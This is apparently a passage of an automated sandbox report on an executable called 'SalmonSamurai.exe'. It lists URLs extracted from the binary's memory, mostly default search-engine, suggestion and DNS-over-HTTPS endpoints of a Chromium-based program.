Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://ph.search.yahoo.com/favicon.ico
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://ph.search.yahoo.com/favicon.icohttps://ph.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://ph.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://ph.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://public.dns.iij.jp/
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://public.dns.iij.jp/IIJ
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://public.dns.iij.jp/dns-query
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://public.dns.iij.jp/dns-queryIijUShttps://nextdns.io/privacyNextDNShttps://chromium.dns.nextdn
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://qc.search.yahoo.com/favicon.ico
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://qc.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://qc.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://se.search.yahoo.com/favicon.ico
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://se.search.yahoo.com/favicon.icohttps://se.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://se.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://search-static-dre.dbankcdn.com/pc/v1/favicon.ico
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://search-static-dre.dbankcdn.com/pc/v1/favicon.icohttps://petalsearch.com/search?query=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://search.daum.net/favicon.ico
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://search.daum.net/favicon.icohttps://search.daum.net/search?w=tot&DA=JU5&q=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://search.daum.net/search?w=tot&DA=JU5&q=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://search.gmx.co.uk/web/result?q=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://search.gmx.com/web/result?q=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://search.gmx.es/web/result?q=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://search.gmx.fr/web/result?q=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://search.goo.ne.jp/cdn/common/img/favicon.ico
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://search.goo.ne.jp/cdn/common/img/favicon.icohttps://search.goo.ne.jp/web.jsp?MT=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://search.goo.ne.jp/sgt.jsp?MT=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://search.goo.ne.jp/web.jsp?MT=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://search.naver.com/search.naver?ie=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://search.privacywall.org/suggest.php?q=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://search.seznam.cz/?q=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://search.seznam.cz/favicon.ico
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://search.seznam.cz/favicon.icohttps://search.seznam.cz/?q=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://search.seznam.sk/?q=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://search.seznam.sk/favicon.ico
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://search.seznam.sk/favicon.icohttps://search.seznam.sk/?q=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://search.yahoo.co.jp/favicon.ico
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://search.yahoo.co.jp/favicon.icohttps://search.yahoo.co.jp/search
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://search.yahoo.co.jp/search
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://search.yahoo.com/favicon.ico
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://search.yahoo.com/search
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?p=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://searchatlas.centrum.cz/?q=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://searchatlas.centrum.cz/favicon.ico
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://searchatlas.centrum.cz/favicon.icohttps://searchatlas.centrum.cz/?q=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://sg.search.yahoo.com/favicon.ico
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://sg.search.yahoo.com/favicon.icohttps://sg.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://sg.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://sg.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://source.chromium.org/chromium/chromium/src/
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://sp.ask.com/sh/i/a16/favicon/favicon.ico
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://sp.ask.com/sh/i/a16/favicon/favicon.icohttps://www.ask.com/web?q=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://ssl.pstatic.net/sstatic/search/favicon/favicon_140327.ico
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://ssl.pstatic.net/sstatic/search/favicon/favicon_140327.icohttps://search.naver.com/search.nav
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://storage.ape.yandex.net/get/browser/Doodles/yandex/drawable-xxhdpi/yandex.png
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://suche.gmx.at/web/result?q=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://suche.gmx.net/web/result?q=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://sug.so.360.cn/suggest?encodein=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://sugg.sogou.com/sugg/ajaj_json.jsp?type=addrbar&key=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://suggest.search.daum.net/sushi/opensearch/pc?q=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://suggest.seznam.cz/fulltext_ff?phrase=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://suggest.seznam.sk/fulltext_ff?phrase=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://suggest.yandex.by/suggest-ff.cgi?part=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://suggest.yandex.com.tr/suggest-ff.cgi?part=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://suggest.yandex.com/suggest-ff.cgi?part=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://suggest.yandex.kz/suggest-ff.cgi?part=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://suggest.yandex.ua/suggest-ff.cgi?part=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://suggestion.baidu.com/su?wd=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://suggestplugin.gmx.at/s?q=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://suggestplugin.gmx.co.uk/s?q=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://suggestplugin.gmx.com/s?q=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://suggestplugin.gmx.es/s?q=
